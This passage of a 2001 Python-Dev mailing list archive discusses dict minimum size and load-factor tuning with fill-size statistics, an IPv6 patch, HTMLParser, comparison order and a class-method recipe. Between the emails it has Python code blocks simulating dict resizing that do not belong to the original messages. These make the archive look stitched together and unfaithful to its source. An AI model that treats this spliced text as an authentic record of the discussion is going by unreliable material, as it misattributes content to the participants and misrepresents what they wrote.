don't know whether the generalization proposed there is necessary to support IPv6 reasonably - the author certainly feels it is. To integrate the patch, I would propose to split it into smaller parts, and submit and review them one-by-one. The first patch should deal only with autoconf stuff, so that the proper #defines are in config.h (although they would not be used right away). The second patch should be a tar file of all new files (the patch on SF actually misses some files).
The third patch should include changes to the C modules, and the last one changes to the standard library modules. For that procedure to work, we need cooperation from the submitter. For that, we probably need to indicate that we are really interested in his work, and will work with him to integrate it into Python. So far, his impression must be that nobody is interested - the patch has been sitting there since 2000-08-16, making it the oldest open patch. Undoubtedly, integrating this piece of work will result in various problems with Python CVS: it won't build anymore on "funny machines" (like Windows), and it might even crash on code that used to work just fine. This prediction is not based on the actual content of the patch, merely on its size, and the fact that IPv6 support is experimental on many systems. So we'd also need a BDFL pronouncement that we really really want this, and that anybody running into problems should either help fixing them, or stay away from CVS while it is being integrated. Regards, Martin From tim at digicool.com Fri May 18 09:17:07 2001 From: tim at digicool.com (Tim Peters) Date: Fri, 18 May 2001 03:17:07 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <15108.19887.534514.864376@slothrop.digicool.com> Message-ID: [Jeremy] > I also did a profile run on CreateInstances, which has a difference of > +55.54% on my machine. It's basically the same story. The instance > dictionary is getting resized more often with Python 2.1+ than it did > with Python 1.5.2. I wouldn't be surprised if several more tests are > showing a slowdown with the same cause. > > So boosting the minimum size sounds like a good thing. I don't know. PyBench is great for showing that *something* changed, but it's got even less claim to "typical use" than pystone. I don't know that the test suite is better in that respect, but it's got much more variety and everyone has it .
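The resize-timing change Tim described earlier in this thread (testing the 2/3 limit before versus after inserting) can be checked with a toy model. This is not CPython's dictobject.c. It tracks only table size, fill and resize count, assumes every key is new, and borrows "smallest power of two above `used*2`" as the sizing rule. `grow` is a hypothetical helper:

```python
def grow(n_items, check_before_insert, minsize=4):
    """Toy model of dict growth; returns (table size, fill, resizes).

    Assumptions: every inserted key is new, a resize re-inserts only the
    live entries (so fill drops to used), and the new table is the smallest
    power of two, starting at `minsize`, that exceeds used*2.
    """
    def new_size(minused):
        size = minsize
        while size <= minused:
            size <<= 1
        return size

    size = fill = used = resizes = 0
    for _ in range(n_items):
        if check_before_insert:
            # Pre-2.1 policy: test the 2/3 limit *before* inserting.
            if fill * 3 >= size * 2:
                size, fill, resizes = new_size(used * 2), used, resizes + 1
        elif size == 0:
            # 2.1 policy: an empty dict first gets a minimum-size table.
            size, resizes = new_size(0), resizes + 1
        fill += 1
        used += 1
        if not check_before_insert and fill * 3 >= size * 2:
            # 2.1 policy: test the 2/3 limit *after* adding a new key.
            size, fill, resizes = new_size(used * 2), used, resizes + 1
    return size, fill, resizes
```

Under these assumptions, three inserts cost one resize before 2.1 (ending with 3 of 4 slots full) and two under 2.1 (3 of 8). A minimum size of 8 brings 2.1 back to one resize, and Jeremy's four-item variant costs two resizes under both policies.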
I stuffed code in dict_dealloc() to record the ma_fill of each dict on its way to the grave (ma_fill == number of non-virgin slots). Across the test suite, here's the ranking, from most to least popular fill: count fill %total cumulative % ------ ---- ------ ------------ 146321 1 53.30 53.30 38200 0 13.91 67.21 32616 2 11.88 79.09 29648 3 10.80 89.89 9884 5 3.60 93.49 5423 4 1.98 95.47 2428 6 0.88 96.35 2016 8 0.73 97.08 1179 7 0.43 97.51 904 9 0.33 97.84 709 103 0.26 98.10 554 10 0.20 98.30 513 13 0.19 98.49 459 12 0.17 98.66 447 11 0.16 98.82 364 14 0.13 98.95 233 15 0.08 99.04 231 16 0.08 99.12 193 18 0.07 99.19 180 17 0.07 99.26 122 19 0.04 99.30 107 30 0.04 99.34 105 21 0.04 99.38 93 22 0.03 99.41 93 20 0.03 99.45 86 256 0.03 99.48 82 23 0.03 99.51 80 26 0.03 99.54 74 24 0.03 99.56 69 27 0.03 99.59 64 25 0.02 99.61 60 29 0.02 99.63 49 28 0.02 99.65 44 34 0.02 99.67 33 32 0.01 99.68 28 31 0.01 99.69 27 37 0.01 99.70 27 33 0.01 99.71 26 35 0.01 99.72 24 36 0.01 99.73 23 39 0.01 99.74 23 38 0.01 99.75 21 128 0.01 99.75 19 44 0.01 99.76 19 40 0.01 99.77 17 46 0.01 99.77 16 48 0.01 99.78 15 47 0.01 99.78 14 50 0.01 99.79 14 42 0.01 99.79 There are many more sizes, but I cut off the display here when they got too rare to round to 1% of 1% of the total count. Boosting the first non-empty size to 8 would allow 93+% of all dicts to get away with at most one resize (a dict of size 8 is enough for a fill of 5, but not 6). OTOH, the current first non-empty size of 4 is enough for 79% of all dicts (enough for a fill of 2, but not 3). If oodles of those tiny dicts are alive *at the same time*, it would be quite a waste of space to force the non-empty ones to carry 8 slots. OTOH, if those small dicts are due to things like building one- or two-element keyword argument dicts, their lifetimes rarely overlap. A more aggressive idea is to allow denser dicts, by allowing them to become no more than 75% full. 
That is, change the resize test from mp->ma_fill*3 >= mp->ma_size*2 to mp->ma_fill*4 > mp->ma_size*3 That would allow the 10.8% of real(er) life dicts with fill 3 to continue living in dicts with 4 slots, and allow about 90% of all dicts to get away with no more than one resize. The downside is that boosting the max load factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit, a small boost in the expected # of compares. But the "theory" is for random hash functions with "uniform probing" (tech term that does *not* mean linear probing), and Python's hash functions often aren't random at all, while AFAIK no rigorous analysis of its probing strategy exists. So, plenty of arbitrary data there upon which to flip a coin . From mal at lemburg.com Fri May 18 09:26:36 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 09:26:36 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: <15108.19887.534514.864376@slothrop.digicool.com> Message-ID: <3B04CEAC.57251CD7@lemburg.com> Jeremy Hylton wrote: > > >>>>> "TP" == Tim Peters writes: > > TP> I've got no interest in trying to restore the old behavior. A > TP> compromise may be to boost the minimum size of a non-empty dict > TP> from 4 to 8. As is, the only non-empty dicts that can get away > TP> with using the current minimum size of 4 have no more than 2 > TP> elements. The question is whether such tiny non-empty dicts are > TP> common enough to make everyone else pay for "an extra" resize. > > I also did a profile run on CreateInstances, which has a difference of > +55.54% on my machine. It's basically the same story. The instance > dictionary is getting resized more often with Python 2.1+ than it did > with Python 1.5.2. I wouldn't be surprised if several more tests are > showing a slowdown with the same cause. > > So boosting the minimum size sounds like a good thing. 
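Tim's two resize tests can be compared directly by asking how many entries each table size holds before the test fires. A small sketch in which `max_fill`, `two_thirds` and `three_quarters` are hypothetical names. The two predicates transcribe the C expressions quoted above:

```python
def two_thirds(fill, size):
    """Current resize test: mp->ma_fill*3 >= mp->ma_size*2."""
    return fill * 3 >= size * 2


def three_quarters(fill, size):
    """Proposed resize test: mp->ma_fill*4 > mp->ma_size*3."""
    return fill * 4 > size * 3


def max_fill(size, needs_resize):
    """Largest fill a table of `size` slots reaches without triggering `needs_resize`."""
    fill = 0
    while not needs_resize(fill + 1, size):
        fill += 1
    return fill


for size in (4, 8, 16):
    print(size, max_fill(size, two_thirds), max_fill(size, three_quarters))
```

For 4 slots this gives 2 entries under the 2/3 test and 3 under the 3/4 test, and for 8 slots 5 versus 6. These match the capacities quoted in the message.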
FYI, I have a patch which inlines small dictionaries directly into the type object (rather than using malloc to allocate the slot buffer). I've experimented with the minimal size a lot and found that setting it to 8 slots gives the bext performance/memory tradeoff. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim at digicool.com Fri May 18 10:32:39 2001 From: tim at digicool.com (Tim Peters) Date: Fri, 18 May 2001 04:32:39 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <3B04CEAC.57251CD7@lemburg.com> Message-ID: [MAL] > FYI, I have a patch which inlines small dictionaries directly > into the type object You don't mean that, but how about uploading the patch to SF anyway? Assign it to me and I'll dig into it. > ... > I've experimented with the minimal size a lot and found that > setting it to 8 slots gives the bext performance/memory tradeoff. Having done just a couple rounds of instrumented runs across various apps, I was moving to that conclusion too. Also that "small" dicts are so common that avoiding the "extra" malloc would be a nice win for them, and that large dicts are rare enough and resizing expensive enough anyway that the new cost of doing a two-headed allocation strategy would be lost in the noise. IOW, I'm inclined to believe that everything you say your patch does is Good For Python, and Guido is so sympathetic to my lack of sleep lately that I bet he'll let me slip in one uglification without scowling . From mal at lemburg.com Fri May 18 13:36:28 2001 From: mal at lemburg.com (M.-A.
Lemburg) Date: Fri, 18 May 2001 13:36:28 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B05093C.8248AE96@lemburg.com> Tim Peters wrote: > > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it. Right, I meant the dict object... (the "not enough coffee" thingie again ;-) > > ... > > I've experimented with the minimal size a lot and found that > > setting it to 8 slots gives the bext performance/memory tradeoff. > > Having done just a couple rounds of instrumented runs across various apps, I > was moving to that conclusion too. Also that "small" dicts are so common > that avoiding the "extra" malloc would be a nice win for them, and that large > dicts are rare enough and resizing expensive enough anyway that the new cost > of doing a two-headed allocation strategy would be lost in the noise. IOW, > I'm inclined to believe that everything you say your patch does is Good For > Python, and Guido is so sympathetic to my lack of sleep lately that I bet > he'll let me slip in one uglification without scowling . I'll see if I find time today to rework the patch for Python CVS. The patch is hiding in my old Python 1.5 killer patch ;-) -- which gives more than a 50% boost on my machine, but that's another story. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 18 13:38:39 2001 From: mal at lemburg.com (M.-A. 
Lemburg) Date: Fri, 18 May 2001 13:38:39 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B0509BF.A2F84A30@lemburg.com> Tim Peters wrote: > > [Jeremy] > > I also did a profile run on CreateInstances, which has a difference of > > +55.54% on my machine. It's basically the same story. The instance > > dictionary is getting resized more often with Python 2.1+ than it did > > with Python 1.5.2. I wouldn't be surprised if several more tests are > > showing a slowdown with the same cause. > > > > So boosting the minimum size sounds like a good thing. > > I don't know. PyBench is great for showing that *something* changed, but > it's got even less claim to "typical use" than pystone. It doesn't claim "typical use". pybench is aimed at finding out performance issues about hot-spots -- there's no such thing as a "typical program", so pybench gives you low level performance compares for very specific tasks, e.g. dictionary creation or for-loop performance. I have found it to be rather successful at that. At least gives some good hints at where to look... > I don't know that the test suite is better in that respect, but it's got much > more variety and everyone has it . I stuffed code in dict_dealloc() to > record the ma_fill of each dict on its way to the grave (ma_fill == number of > non-virgin slots). 
Across the test suite, here's the ranking, from most to > least popular fill: > > count fill %total cumulative % > ------ ---- ------ ------------ > 146321 1 53.30 53.30 > 38200 0 13.91 67.21 > 32616 2 11.88 79.09 > 29648 3 10.80 89.89 > 9884 5 3.60 93.49 > 5423 4 1.98 95.47 > 2428 6 0.88 96.35 > 2016 8 0.73 97.08 > 1179 7 0.43 97.51 > 904 9 0.33 97.84 > 709 103 0.26 98.10 > 554 10 0.20 98.30 > 513 13 0.19 98.49 > 459 12 0.17 98.66 > 447 11 0.16 98.82 > 364 14 0.13 98.95 > 233 15 0.08 99.04 > 231 16 0.08 99.12 > 193 18 0.07 99.19 > 180 17 0.07 99.26 > 122 19 0.04 99.30 > 107 30 0.04 99.34 > 105 21 0.04 99.38 > 93 22 0.03 99.41 > 93 20 0.03 99.45 > 86 256 0.03 99.48 > 82 23 0.03 99.51 > 80 26 0.03 99.54 > 74 24 0.03 99.56 > 69 27 0.03 99.59 > 64 25 0.02 99.61 > 60 29 0.02 99.63 > 49 28 0.02 99.65 > 44 34 0.02 99.67 > 33 32 0.01 99.68 > 28 31 0.01 99.69 > 27 37 0.01 99.70 > 27 33 0.01 99.71 > 26 35 0.01 99.72 > 24 36 0.01 99.73 > 23 39 0.01 99.74 > 23 38 0.01 99.75 > 21 128 0.01 99.75 > 19 44 0.01 99.76 > 19 40 0.01 99.77 > 17 46 0.01 99.77 > 16 48 0.01 99.78 > 15 47 0.01 99.78 > 14 50 0.01 99.79 > 14 42 0.01 99.79 > > There are many more sizes, but I cut off the display here when they got too > rare to round to 1% of 1% of the total count. > > Boosting the first non-empty size to 8 would allow 93+% of all dicts to get > away with at most one resize (a dict of size 8 is enough for a fill of 5, but > not 6). OTOH, the current first non-empty size of 4 is enough for 79% of all > dicts (enough for a fill of 2, but not 3). If oodles of those tiny dicts are > alive *at the same time*, it would be quite a waste of space to force the > non-empty ones to carry 8 slots. OTOH, if those small dicts are due to > things like building one- or two-element keyword argument dicts, their > lifetimes rarely overlap. I found that instance dictionaries are usual within the 8 slot range. 
You normally have a few heavyweight instances and many lightweight ones which only have two or three attributes in their instance dict. > A more aggressive idea is to allow denser dicts, by allowing them to become > no more than 75% full. That is, change the resize test from
>
>     mp->ma_fill*3 >= mp->ma_size*2
>
> to
>
>     mp->ma_fill*4 > mp->ma_size*3
>
> That would allow the 10.8% of real(er) life dicts with fill 3 to continue > living in dicts with 4 slots, and allow about 90% of all dicts to get away > with no more than one resize. The downside is that boosting the max load > factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit, > a small boost in the expected # of compares. But the "theory" is for random > hash functions with "uniform probing" (tech term that does *not* mean linear > probing), and Python's hash functions often aren't random at all, while AFAIK > no rigorous analysis of its probing strategy exists. > > So, plenty of arbitrary data there upon which to flip a coin. Why not make those parameters macros at the top of dictobject.c which can then be tuned to whatever the programmer needs/wants ?! -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Fri May 18 17:05:45 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 10:05:45 -0500 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 04:32:39 -0400." References: Message-ID: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it.
(I guess he means the buffer is alloc'ed contiguously with the dict object head. That's often a nice strategy. Could do that for small lists too maybe, except those haven't gotten anybody's attention just yet.) > > ... > > I've experimented with the minimal size a lot and found that > > setting it to 8 slots gives the best performance/memory tradeoff. > > Having done just a couple rounds of instrumented runs across various apps, I > was moving to that conclusion too. Also that "small" dicts are so common > that avoiding the "extra" malloc would be a nice win for them, and that large > dicts are rare enough and resizing expensive enough anyway that the new cost > of doing a two-headed allocation strategy would be lost in the noise. IOW, > I'm inclined to believe that everything you say your patch does is Good For > Python, and Guido is so sympathetic to my lack of sleep lately that I bet > he'll let me slip in one uglification without scowling. Yeah, this one sounds like a nice improvement. --Guido van Rossum (home page: http://www.python.org/~guido/) From thomas at xs4all.net Fri May 18 17:00:21 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Fri, 18 May 2001 17:00:21 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 10:05:45AM -0500 References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> Message-ID: <20010518170021.B16811@xs4all.nl> On Fri, May 18, 2001 at 10:05:45AM -0500, Guido van Rossum wrote: > (I guess he means the buffer is alloc'ed contiguously with the dict > object head. That's often a nice strategy. Could do that for small > lists too maybe, except those haven't gotten anybody's attention just > yet.) Sounds to me like it would benefit tuples even more than lists or dicts.
At least in my code, I see more short tuples than short lists, and they are usually not altered after creation ;-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From fdrake at acm.org Fri May 18 17:12:34 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Fri, 18 May 2001 11:12:34 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <20010518170021.B16811@xs4all.nl> References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> Message-ID: <15109.15330.592471.32664@cj42289-a.reston1.va.home.com> Thomas Wouters writes: > Sounds to me like it would benefit tuples even more than lists or dicts. At > least in my code, I see more short tuples than short lists, and they are > usually not altered after creation ;-) The slots of tuples are already allocated inline, so I don't think they'll get much better. ;-) -- Fred L. Drake, Jr. PythonLabs at Digital Creations From guido at digicool.com Fri May 18 17:27:39 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 11:27:39 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 17:00:21 +0200." <20010518170021.B16811@xs4all.nl> References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> Message-ID: <200105181527.KAA19923@cj20424-a.reston1.va.home.com> > > (I guess he means the buffer is alloc'ed contiguously with the dict > > object head. That's often a nice strategy. Could do that for small > > lists too maybe, except those haven't gotten anybody's attention just > > yet.) > > Sounds to me like it would benefit tuples even more than lists or dicts. At > least in my code, I see more short tuples than short lists, and they are > usually not altered after creation ;-) Which is why tuples already have this feature. Posted before your first cup of coffee?
:-) --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik at effbot.org Fri May 18 17:36:39 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Fri, 18 May 2001 17:36:39 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1 References: Message-ID: <004401c0dfb0$57b7df00$e46940d5@hagrid> guido wrote: > A much improved HTML parser -- a replacement for sgmllib. The API is > derived from but not quite compatible with that of sgmllib, so it's a > new file. I suppose it needs documentation, and htmllib needs to be > changed to use this instead of sgmllib, and sgmllib needs to be > declared obsolete. any reason this cannot be made compatible with sgmllib? Cheers /F From thomas at xs4all.net Fri May 18 17:36:42 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Fri, 18 May 2001 17:36:42 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 11:27:39AM -0400 References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> <200105181527.KAA19923@cj20424-a.reston1.va.home.com> Message-ID: <20010518173642.S16791@xs4all.nl> On Fri, May 18, 2001 at 11:27:39AM -0400, Guido van Rossum wrote: > > > (I guess he means the buffer is alloc'ed contiguously with the dict > > > object head. That's often a nice strategy. Could do that for small > > > lists too maybe, except those haven't gotten anybody's attention just > > > yet.) > > > > Sounds to me like it would benefit tuples even more than lists or dicts. At > > least in my code, I see more short tuples than short lists, and they are > > usually not altered after creation ;-) > > Which is why tuples already have this feature. > > Posted before your first cup of coffee?
:-) No, after my last meeting, before my first witbier of the friday-afternoon-office-beer-binge :) TGIF ;) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From guido at digicool.com Fri May 18 17:49:25 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 11:49:25 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1 In-Reply-To: Your message of "Fri, 18 May 2001 17:36:39 +0200." <004401c0dfb0$57b7df00$e46940d5@hagrid> References: <004401c0dfb0$57b7df00$e46940d5@hagrid> Message-ID: <200105181549.KAA20101@cj20424-a.reston1.va.home.com> > guido wrote: > > A much improved HTML parser -- a replacement for sgmllib. The API is > > derived from but not quite compatible with that of sgmllib, so it's a > > new file. I suppose it needs documentation, and htmllib needs to be > > changed to use this instead of sgmllib, and sgmllib needs to be > > declared obsolete. > > any reason this cannot be made compatible with sgmllib? The sgmllib API design has a few real bogosities. I can't recall what they were, but we looked into keeping it compatible, and it wasn't worth the pain. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Fri May 18 18:57:34 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 12:57:34 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Thu, 17 May 2001 21:45:29 +0200." <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> References: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> Message-ID: <200105181657.LAA20517@cj20424-a.reston1.va.home.com> > According to the CVS log, this implementation of do_cmp was installed > in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific > rationale for doing do_cmp in that order? You can ask me directly, loewis. 
:-) I believe that my thinking at the time was that tp_compare should only be used as a final fallback, just before comparing by address. This was consistent with my desire to completely get rid of tp_compare. But until that is done, I now agree that it makes more sense to try tp_compare first when a three-way-compare is requested -- especially in the light of sequence comparison. --Guido van Rossum (home page: http://www.python.org/~guido/) From nas at python.ca Fri May 18 19:37:33 2001 From: nas at python.ca (Neil Schemenauer) Date: Fri, 18 May 2001 10:37:33 -0700 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>; from mal@lemburg.com on Fri, May 18, 2001 at 09:26:36AM +0200 References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> Message-ID: <20010518103733.A22185@glacier.fnational.com> M.-A. Lemburg wrote: > FYI, I have a patch which inlines small dictionaries directly > into the type object (rather than using malloc to allocate > the slot buffer). Would it be faster to inline an association table rather than a hash table? Neil From guido at digicool.com Fri May 18 19:43:45 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 13:43:45 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 10:37:33 PDT." <20010518103733.A22185@glacier.fnational.com> References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> Message-ID: <200105181743.MAA26532@cj20424-a.reston1.va.home.com> > Would it be faster to inline an association table rather than a > hash table? What's an association table?
--Guido van Rossum (home page: http://www.python.org/~guido/) From nas at python.ca Fri May 18 20:15:59 2001 From: nas at python.ca (Neil Schemenauer) Date: Fri, 18 May 2001 11:15:59 -0700 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 01:43:45PM -0400 References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com> Message-ID: <20010518111559.A22344@glacier.fnational.com> Guido van Rossum wrote: > What's an association table? A table of keys and values. Values are looked up by looping over the table comparing each key until the correct one is found (i.e. it's O(n) where n is the size of the table). For Python, the cost of doing compares probably outweighs the cost of doing the hashing, even for small tables. It's not clear to me though if it would be a win. Assuming that interned strings are the most common key, an association table with four entries would take on average two pointer compares to look up a value. Neil From mal at lemburg.com Fri May 18 20:15:37 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 20:15:37 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B0566C9.90F17DB1@lemburg.com> Tim Peters wrote: > > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it.
There you go: https://sourceforge.net/tracker/?func=detail&aid=425242&group_id=5470&atid=305470 -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Fri May 18 20:23:55 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 14:23:55 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 11:15:59 PDT." <20010518111559.A22344@glacier.fnational.com> References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com> <20010518111559.A22344@glacier.fnational.com> Message-ID: <200105181823.NAA32234@cj20424-a.reston1.va.home.com> > Guido van Rossum wrote: > > What's an association table? > > A table of keys and values. Values are looked up by looping over > the table comparing each key until the correct one is found (i.e. > it's O(n) where n is the size of the table). For Python, the cost > of doing compares probably outweighs the cost of doing the > hashing, even for small tables. > > It's not clear to me though if it would be a win. Assuming that > interned strings are the most common key, an association table with > four entries would take on average two pointer compares to look > up a value. > > Neil I see. At the cost of yet another algorithm, of course. --Guido van Rossum (home page: http://www.python.org/~guido/) From James_Althoff at i2.com Fri May 18 21:10:11 2001 From: James_Althoff at i2.com (James_Althoff at i2.com) Date: Fri, 18 May 2001 12:10:11 -0700 Subject: [Python-Dev] Re: Simulating Class (was Re: Does Python have Class methods) Message-ID: Python-dev'ers, Pardon the intrusion, but Aahz Maruch suggested that I post this to the python-dev list.
The message below illustrates "yet another class method recipe" that Costas synthesized (and which I then modified very slightly) from various posts following another discussion on python-list about class methods (as we all await the "type/class healing" stuff some of you are working on -- go team!). This variant uses explicit "metaclasses" (defined as regular classes) whose instances ("meta objects") point to class objects (since they cannot *be* class objects in current Python). Anyway, I think the approach has some nice properties. Best regards, Jim ----- Forwarded by James Althoff/AMER/i2Tech on 05/18/01 11:23 AM ----- James Althoff, 05/14/01 02:09 PM To: python-list at python.org Subject: Re: Simulating Class (was Re: Does Python have Class methods) Costas writes: >Ok, so after looking thru how Python works and comments from people, I >came up with what I believe may be the best way to implement Class >methods and Class variables. > > > >Costas I think this idea is quite good. I would amend it very slightly by suggesting the convention of defining *three* separate names in the enclosing module: 1) the name of the enclosing class 2) the name of the singleton instance of the enclosing class 3) the name of the enclosed class To support this, I would propose using a naming convention as below. If one is interested in defining a class Spam, then use the following names: 1) SpamMetaClass -- names the enclosing class 2) SpamMeta -- names a singleton instance of the enclosing class 3) Spam -- names the enclosed class Use the name SpamMetaClass when you need to derive a subclass of SpamMetaClass, e.g., class SpecialSpamMetaClass(SpamMetaClass): pass Use the name SpamMeta to invoke a class method, e.g., SpamMeta.aClassMethod() Use the name Spam to make instances as usual, e.g., s = Spam() (and to derive a subclass of Spam).
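The three-name convention can be sketched in a few lines. This version is written for modern Python 3 rather than the Python 2 of this thread, and `aClassMethod`, `describe` and `new` are hypothetical placeholders, not part of Jim's or Costas's recipe:

```python
class SpamMetaClass:
    """Enclosing class: its methods act as "class methods" for Spam."""

    class Spam:
        """Enclosed class: ordinary instance methods live here."""

        def describe(self):
            return "a Spam instance"

    def aClassMethod(self):
        # Hypothetical class method: needs no Spam instance to run.
        return "class method of " + type(self).__name__

    def new(self):
        # Hypothetical factory method: create a Spam via the singleton.
        return self.Spam()


SpamMeta = SpamMetaClass()  # singleton instance of the enclosing class
Spam = SpamMeta.Spam        # module-level name for the enclosed class


class SpecialSpamMetaClass(SpamMetaClass):
    # Subclassing the enclosing class lets "class methods" be overridden.
    def aClassMethod(self):
        return "special " + super().aClassMethod()


if __name__ == "__main__":
    print(SpamMeta.aClassMethod())
    print(SpecialSpamMetaClass().aClassMethod())
    print(Spam().describe())
    print(isinstance(SpamMeta.new(), Spam))
```

Because `SpamMeta` is an ordinary instance of an ordinary class, the override in `SpecialSpamMetaClass` works through normal method lookup, which is the inheritance-plus-override property the post goes on to claim for the recipe.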
Although SpamMetaClass is not a metaclass in the sense of Smalltalk or Ruby -- that is to say, the class Spam is not an instance of SpamMetaClass -- nonetheless, SpamMetaClass still acts as a "higher level" class that provides methods on behalf of the class Spam where said methods are 1) independent of any particular instance of Spam and 2) allow for factory-method-style creation of Spam instances -- these being two very important attributes of the metaclass concept. Plus "meta" is a nice, short name. :-) Plus using "MetaClass" to refer to the class and "Meta" to refer to the singleton instance of "MetaClass" is reasonably clear and succinct, I think. One nice thing about the proposed recipe is that the SpamMeta object is a real class instance of a real class. This means that -- unlike when using the "module function" recipe -- we get inheritance of methods, and -- unlike when using the "callable wrapper class" recipe -- we also get override of methods. The example below illustrates both of these important capabilities. 
class Class1MetaClass:                   # Base metaclass
    # Define "class methods" for Class1
    def whoami(self):
        print 'Class1MetaClass.whoami:', self
    def new(self):                       # Factory method
        """Return a new instance"""
        return self.Class1()
    def newList(self,n=3):               # Another factory method
        """Return a list of new instances"""
        l = []
        for i in range(n):
            newInstance = self.new()
            l.append(newInstance)
        return l
    # Define Class1 & its "instance methods"
    class Class1:                        # Base class
        def whoami(self):
            print 'Class1.whoami:', self

Class1Meta = Class1MetaClass()   # Make & name the singleton metaclass instance
Class1 = Class1Meta.Class1       # Make the Class1 name accessible

class Class2MetaClass(Class1MetaClass):  # Derived metaclass
    # Define "class methods" for Class2 -- Override Class1 "class methods"
    def whoami(self):
        print 'Class2MetaClass.whoami:', self
    def new(self):                       # Override the factory method
        return self.Class2()
    # Define Class2 & its "instance methods"
    class Class2(Class1):                # Derived class
        def whoami(self):
            print 'Class2.whoami:', self

Class2Meta = Class2MetaClass()   # Make & name the singleton metaclass instance
Class2 = Class2Meta.Class2       # Make the Class2 name accessible

# Test
Class1Meta.whoami()          # invoke "class method" of base class
Class2Meta.whoami()          # invoke "class method" of derived class
Class1().whoami()            # make an instance & invoke "instance method"
Class2().whoami()
print Class1Meta.newList()   # factory method
print Class2Meta.newList()   # inherit factory method with override

>>> reload(meta6)
Class1MetaClass.whoami:
Class2MetaClass.whoami:
Class1.whoami:
Class2.whoami:
[, , ]
[, , ]

